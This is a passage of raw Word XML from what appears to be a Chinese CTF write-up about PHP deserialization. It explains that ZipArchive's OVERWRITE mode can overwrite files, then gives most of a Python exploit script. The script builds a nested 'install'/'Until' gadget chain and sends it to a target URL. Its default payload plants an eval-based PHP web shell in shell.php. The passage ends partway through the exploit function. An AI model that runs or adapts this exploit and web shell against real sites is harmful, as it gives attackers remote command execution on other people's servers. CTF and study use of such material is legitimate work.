        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ZipArchive类的open方法可以创建/覆盖文件，配合常量8（OVERWRITE模式）可以写入任意内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E4F25" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF1176" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DBF99" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>import urllib.parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC215A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58728E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD"/>
    <w:p w14:paraId="582F8AE6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>class PayloadGenerator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0872D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E9938" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        self.url = "http://c7c0b927.clsadp.com/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8EB50" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF81A1A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    def generate_payload(self, shell_code=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620E4091" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFF4E2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>生成反序列化</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF265C1" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71368D47" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        if shell_code is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6D9C6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            shell_code = '&lt;?php @eval($_POST["cmd"]);?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D59DE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D8ACA" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>构造三层攻击链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67624BDC" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>第一层：最外层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41052717" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>第二层：中间层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB973F8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>第三层：最内层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Until </w:t>
      </w:r>
      <w:r>
        <w:t>对象指向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ZipArchive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA2F065" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED43E8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>第三层：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Until </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ZipArchive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385306BB" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        inner_until = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6435F98A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            'a': 'ZipArchive',  # </w:t>
      </w:r>
      <w:r>
        <w:t>类名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B31986" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'b': 'shell.php',   # </w:t>
      </w:r>
      <w:r>
        <w:t>文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E6DCDB" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'c': 8              # ZipArchive::OVERWRITE </w:t>
      </w:r>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB399B9" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D11B7" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D8C93" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>第二层：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">install </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (username </w:t>
      </w:r>
      <w:r>
        <w:t>指向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Until)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004696E2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        middle_install = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F170769" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'username': {'Until': inner_until},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2184208A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'password': 'pad'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E10461" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771EA8F" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58404A50" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>第一层：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">install </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (username </w:t>
      </w:r>
      <w:r>
        <w:t>指向第二层</w:t>
      </w:r>
      <w:r>
        <w:t>install)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FBB26" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        outer_install = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B83B6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'username': {'install': middle_install},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8ADF7" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'password': 'pad'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726B632" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3328715C" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31919E0E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>install</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A694B70" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        shell_install = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FE50C" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'username': shell_code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6982E3A2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            'password': 'pad'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D63BBCE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628B4A3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6B325" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:t>最终</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t>数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00337BCB" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        payload = [{'install': shell_install}, {'install': outer_install}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220DD35" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D31884" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        return payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A605526" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF5A70" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    def serialize_php(self, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D4709" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0B27FF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>数据结构转换为</w:t>
      </w:r>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>序列化字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A21B4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BBB57A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        if isinstance(data, dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E0747" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            if len(data) == 1 and 'install' in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D9EF3B" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                # install </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB8C5D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                obj = data['install']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04B522" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                private_prefix = "\x00install\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5C207" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result = f'O:7:"install":2:{{'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1156DE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += f's:17:"{private_prefix}username";'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E51B2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += self.serialize_php(obj['username'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD10BB4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += f's:17:"{private_prefix}password";'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BAE3EA" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += self.serialize_php(obj['password'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C65496" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += '}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A7CA64" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C5E9C" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            elif len(data) == 1 and 'Until' in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9638F3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                # Until </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713978B" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                obj = data['Until']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9A475" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result = f'O:5:"Until":3:{{'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08170B1A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += f's:1:"a";{self.serialize_php(obj["a"])}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77119BD0" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += f's:1:"b";{self.serialize_php(obj["b"])}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799383AE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += f's:1:"c";{self.serialize_php(obj["c"])}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F93A3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += '}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F9D91" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CBD36" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C438BEB" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                # </w:t>
      </w:r>
      <w:r>
        <w:t>普通字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265BA544" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result = f'a:{len(data)}:{{'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DFF4F3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                for i, (key, value) in enumerate(data.items()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4E08D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                    result += self.serialize_php(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E745A2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                    result += self.serialize_php(value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40672B79" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += '}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB8FB5" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4E8EC" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        elif isinstance(data, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66287B3A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            return f's:{len(data)}:"{data}";'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C4393" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        elif isinstance(data, int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038940A3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            return f'i:{data};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438165B6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        elif isinstance(data, list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627CF4F" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            result = f'a:{len(data)}:{{'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048DB85" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            for i, item in enumerate(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A64A5" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += self.serialize_php(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93D3EE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                result += self.serialize_php(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B35F799" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            result += '}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606893E1" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDFCC6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D71031" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            return ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9526F4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0441ED" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">    def exploit(self, cmd=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461C822" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647B28B" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t>执行漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47995171" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD638CF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E5875" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A452A0" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            payload_obj = self.generate_payload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02A0F6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            serialized = self.serialize_php(payload_obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE5D93B" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB7A6E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>生成的序列化</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t>长度</w:t>
      </w:r>
      <w:r>
        <w:t>: {len(serialized)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0324D18A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[+] Payload: {serialized[:100]}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36874D1C" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA60AEE" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            # URL</w:t>
      </w:r>
      <w:r>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE428D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            encoded_payload = urllib.parse.quote(serialized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784BD8E3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC691D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:t>发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE93FB3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            target_url = f"{self.url}?data={encoded_payload}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D7869" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>目标</w:t>
      </w:r>
      <w:r>
        <w:t>URL: {self.url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304151CD" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">            print(f"[+] </w:t>
      </w:r>
      <w:r>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:t>...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBF07A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
